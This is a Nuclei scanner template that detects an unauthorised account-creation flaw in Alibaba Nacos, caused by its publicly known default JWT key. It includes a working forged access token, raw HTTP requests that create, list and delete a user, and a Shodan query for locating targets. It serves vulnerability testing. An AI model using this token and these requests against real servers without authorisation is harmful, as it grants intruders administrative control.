nuclei-templates/http/misconfiguration/nacos/nacos-create-user.yaml

41 lines
1.7 KiB
YAML

id: nacos-create-user
info:
name: Alibaba Nacos - Unauthorized Account Creation
author: SleepingBag945
severity: high
description: |
Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml
metadata:
verified: true
max-request: 3
shodan-query: title:"Nacos"
tags: misconfig,nacos,unauth,bypass,instrusive
http:
- raw:
- |
POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
Host: {{Hostname}}
- |
GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
Host: {{Hostname}}
- |
DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
Host: {{Hostname}}
payloads:
token:
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
attack: pitchfork
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'create user ok!')"
- "status_code_3 == 200 && contains(body_3,'delete user ok!')"
condition: and
# digest: 490a00463044022035dd3e81460a17dce5f817479772130279b295687fd12cf6a77a263c479abbb40220781474ffa64fc9ac8255b1c830542d9acdd106252296def591965d3ec41aef3b:922c64590222798bb761d5b6d8e72950